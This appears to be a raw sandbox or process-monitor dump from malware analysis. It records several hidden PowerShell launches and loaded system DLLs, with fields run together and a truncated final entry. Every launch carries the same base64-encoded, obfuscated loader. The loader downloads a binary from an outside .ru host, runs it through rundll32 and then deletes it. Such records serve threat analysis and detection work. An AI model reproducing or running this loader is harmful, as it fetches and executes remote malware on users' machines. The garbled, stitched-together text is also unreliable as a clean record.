ACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1252"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2356"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2444"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgB